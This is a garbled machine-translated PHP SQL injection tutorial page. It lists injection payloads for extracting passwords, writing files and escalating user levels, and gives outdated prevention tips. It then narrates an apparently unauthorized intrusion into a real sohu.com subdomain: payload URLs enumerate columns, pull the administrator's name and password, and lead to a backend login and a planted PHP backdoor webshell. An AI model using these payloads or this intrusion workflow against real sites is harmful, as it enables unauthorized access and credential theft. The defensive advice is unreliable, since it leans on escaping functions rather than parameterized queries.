PHP SQL Injection Process Analysis _php Tutorial

Source: Internet
Author: User
Tags mysql injection ord administrator password
Today I learned the basic skills of SQL injection from the Internet. SQL injection focuses on the construction of SQL statements, only the flexible use of SQL
Statement to construct the injected string of the bull ratio. After finishing the study, I wrote some notes, ready to use. I hope you're looking at the following.
The rationale for solving SQL. The code in the note comes from the network.
  = = = Basic Part = = =
This table inquires:
Http://127.0.0.1/injection/user.php?username=angel ' and LENGTH (password) = ' 6
Http://127.0.0.1/injection/user.php?username=angel ' and Left (password,1) = ' m
Union UNION statement:
Http://127.0.0.1/injection/show.php?id=1 ' Union select 1,username,password from user/*
Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user/*
Export File:
Http://127.0.0.1/injection/user.php?username=angel ' into outfile ' c:/file.txt
Http://127.0.0.1/injection/user.php?username= ' or 1=1 into outfile ' C:/file.txt
Http://127.0.0.1/injection/show.php?id= ' Union select 1,username,password from user to outfile ' c:/user.txt
   INSERT statement:
INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (' ', ' $username ', ' $password ', ' $homepage ', ' 1 ');
Construct Homepage Value: Http://4ngel.net ', ' 3 ') #
The SQL statement becomes: INSERT into ' user ' (userid, username, password, homepage, userlevel) VALUES (' ', ' Angel ', ' mypass ', ' Http://4ngel '). Net ', ' 3 ') # ', ' 1 ');
   UPDATE statement: I like such a thing.
First understand this SQL
UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' $id '
If this SQL is modified to the following form, an injection is implemented
1: Modify the homepage value to
Http://4ngel.net ', userlevel= ' 3
The SQL statement then changes to
UPDATE user SET password= ' mypass ', homepage= ' http://4ngel.net ', userlevel= ' 3 ' WHERE id= ' $id '
Userlevel for User Level
2: Modify the password value to
Mypass) ' WHERE username= ' admin ' #
The SQL statement then changes to
UPDATE user SET password= ' MD5 (mypass) ' where username= ' admin ' #) ', homepage= ' $homepage ' where id= ' $id '
3: Modify the ID value to
' OR username= ' admin '
The SQL statement then changes to
UPDATE user SET password= ' MD5 ($password) ', homepage= ' $homepage ' WHERE id= ' OR username= ' admin '
  = = = Advanced Part = = =
Common MySQL built-in functions
DATABASE ()
USER ()
System_user ()
Session_user ()
Current_User ()
Database ()
Version ()
SUBSTRING ()
MID ()
CHAR ()
Load_file ()
......
function application
UPDATE article SET title=database () WHERE id=1
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,database (), version ()
SELECT * from user WHERE Username=char (97,110,103,101,108)
# char (97,110,103,101,108) equals Angel, Decimal
Http://127.0.0.1/injection/user.php?userid=1 and Password=char (109,121,112,97,115,115) http://127.0.0.1/injection /user.php?userid=1 and Left (password,1) >char (100)
Http://127.0.0.1/injection/user.php?userid=1 and Ord (Mid (password,3,1)) >111
Determine the number and type of fields in a data structure
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,1,1
Http://127.0.0.1/injection/show.php?id=-1 Union Select char ($), char (97)
Guess the name of the data table
Http://127.0.0.1/injection/show.php?id=-1 Union Select 1,1,1 from
Cross-table queries get user name and password
http://127.0.0.1/ymdown/show.php?id=10000 Union Select 1,username,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1
Other
#验证第一位密码
HTTP://127.0.0.1/YMDOWN/SHOW.PHP?ID=10 Union Select 1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 from Ymdown_user where id=1 and Ord (Mid (password,1,1)) =49
= = = Injection Prevention = = =
Server aspects
MAGIC_QUOTES_GPC set to On
Display_errors set to Off
Coding aspects
$keywords = Addslashes ($keywords);
$keywords = Str_replace ("_", "\_", $keywords);
$keywords = str_replace ("%", "\%", $keywords);
Numeric type
Use Intval () to catch a change
String type
Add single quotation marks to the SQL statement parameter
The following code is used to prevent injection
if (GET_MAGIC_QUOTES_GPC ()) {
//....
}else{
$str = mysql_real_escape_string ($STR);
$keywords = Str_replace ("_", "\_", $keywords);
$keywords = str_replace ("%", "\%", $keywords);
}
Useful functions
Stripslashes ()
GET_MAGIC_QUOTES_GPC ()
Mysql_real_escape_string ()
Strip_tags ()
Array_map ()
Addslashes ()
Reference article:
Http://www.4ngel.net/article/36.htm (SQL injection with MySQL) Chinese
http://www.phpe.net/mysql_manual/06-4.html (MySQL statement reference)
A safety test for sohu.com
Posted in Hacker defenses
Posted in Http://www.loveshell.net
Sohu.com is a relatively large domestic portal, providing a lot of services, including mailboxes. Such a large web site, no problem is difficult, as the saying goes, the more the more insecure! Whether it is for the server or the site is this truth, recently learned MySQL injection, so by the way to Sohu.com do a small security detection, see if it exists SQL injection vulnerability.
Look at the main station of the sohu.com is almost static, so give up the idea of looking for a problem on the main station. Directly in the sohu.com of the various sub-stations to browse a circle, found that most of the Web site is a PHP script, there are a few JSP script, according to experience we know, for PHP built system, the general background database is MySQL, as if the ASP corresponds to MSSQL, There seems to be a lot of places where there may be problems. Because of the PHP features (the PHP default will be passed in the parameters of the ' characters are converted, so for the character type of the variable by default, it is difficult to inject), in general, we inject only a numeric type of variables. According to the knowledge injected at ordinary times, we know that the parameters passed by id=xxx are usually numeric type variables, so we just have to test those php?id=xxx connections to find a loophole! Through a careful search, It really made me find a problem connection on XXX.it.sohu.com http://XXX.it.sohu.com/book/serialize.php?id=86
Submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=1/*
Return to normal 1.
Then submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and 1=2/*
Return no information 2, empty it, should be the result of the SQL statement is empty.
With these two URLs we can guess that the vulnerability exists because our committed and 1=1 and and 1=2 are executed as SQL statements! Then the other statements we commit are also executable, and this is SQL injection! We can also know that the ID variable is treated as a number and not placed in "Between, otherwise we can not succeed!" If the variable does not filter the SQL other keywords, we are likely to succeed! I met a lot of situations are variable filter Select, in MySQL is dead end, good depressed!
Now that the loophole is there, let's go ahead! Of course, the type of probe database and the account connected to the database! High permissions and the database and the Web with the machine can exempt guessing field pain! Submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and Ord (Mid (Version (), >51/*))
Return to normal 3, this statement is to see the database version is not higher than 3, because 3 of the ASCII is 51 Ah! The first character of the version is greater than 51, of course, 4.0 or more! More than 4.0 is a support union query, so you can dispense with a guess of the pain Oh! The result here is true, So the database is more than 4.0 oh, can support union.
Now that the union query is supported, give the field of this statement a burst of time! Later in the union to find out what is very fast oh! Submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 10/*
Return the result normal 4, it appears that the field is greater than 10, continue to commit:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 20/*
Normal return, Commit:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 30/*
......
No information returned to ORDER by 50! Appears to be greater than 40 less than 50, so submit:
http://XXX.it.sohu.com/book/serialize.php?id=86 ORDER BY 45/*
......
Finally guess the field is about 41! Here it is because some fields are not sortable, so we also need to use the Union to pinpoint the field number 41, commit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union Select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 /*
Return results 5, haha, success! What fields are displayed on the page is also at a glance! Now let's go on! Submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41/*
Returns the result 6, completes the database system the detection Oh! We probably are not root, and the database server and the Web is probably not on a server, so we have no file permissions! Submit:
Http://XXX.it.sohu.com/book/serialize.php?id=86 and (select COUNT (*) from Mysql.user) >0/*
Returns the result 7, no Read permission to MySQL, more certain permissions are not root! hehe!
Since it is not root, do not be discouraged, let us continue! Before further guessing the data we'd better find the backstage first, many times found the administrator password but can not find a place to land, very depressed said! In the root directory, add/admin and/manage/and so on the background commonly used addresses are returned 404 error, Guess a few times finally in the/book/directory admin of the time appeared 403 Forbiden error, haha, is the existence of this directory! But the landing page can not guess, depressed! But since I know that there is an admin said, go to Google search:
Admin site:sohu.com
8, got another sub-station forum, we know that people are very lazy, usually a place backstage features is likely to be the characteristics of the entire site, so when I try to visit/book/admin/admuser.php when the miracle appeared, 9, Haha, closer to the success Oh! Here we know the background of the site, in fact, we can also get very important information, view the original document found the name of the login form is name and password, it is easy to speculate on the other side of the structure of the Administrator table, even if not in line with the estimate is similar, hehe! So know why we have to guess the backstage! Go ahead and inject it! Submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from admin/*
Returns an error stating that there is no admin for this table, try admins and admin_user and so on, and finally commit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,user (), 3,4,database (), 6,7,8,9,10,version (), 12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
The time to return to success, haha! There is a user this table! What about the Administrator table? continue to submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,name, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 From user/*
Error returning empty information, commit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,password, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 From user/*
Return results 10, haha normal return and come out a password, should be the Administrator table the first user's password! So what's his user name? Guess a lot of fields are return errors, there is no way to enter an ID, incredibly return success! ID is the name of the administrator Oh! Submit:
HTTP://XXX.IT.SOHU.COM/BOOK/SERIALIZE.PHP?ID=86 and 1=2 Union select 1,password,3,4,id, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 from user/*
Return results 11, haha, get the name of the administrator Oh! Excited to take the administrator name and password to the backstage landing successfully! 12. Now is the time to think about how to take Webshell, in the background to find a place to upload pictures, but when uploading PHP files when prompted to say that it is not a picture file, depressed! In the background carefully messy messy turn, found a php file to generate the function, so in the inside inserted a sentence of PHP back door , 13, the point generated after the prompt success, it seems that if there is no filter, we should have been Webshell, the password is a, with a word back door connected to 14, haha, success! The script detects this success!
After getting Webshell I looked on the server, found that the security of the server is doing well, unable to execute the command, and basically all of the directories in addition to the directory we just uploaded is not writable, but as a script test, got Webshell also even success! can also be seen, A small parameter does not filter can lead to the fall of the site, especially like sohu.com such as the station, more parameters, more attention to the problem of filtering!

http://www.bkjia.com/PHPjc/324786.html www.bkjia.com true http://www.bkjia.com/PHPjc/324786.html techarticle today I learned the basic skills of SQL injection from the Internet. The focus of SQL injection is to construct SQL statements, and only use SQL statements flexibly to construct the injected string of the bull ratio. After finishing the study ...

  • Contact Us

    The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

    If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

    A Free Trial That Lets You Build Big!

    Start building with 50+ products and up to 12 months usage for Elastic Compute Service

    • Sales Support

      1 on 1 presale consultation

    • After-Sales Support

      24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.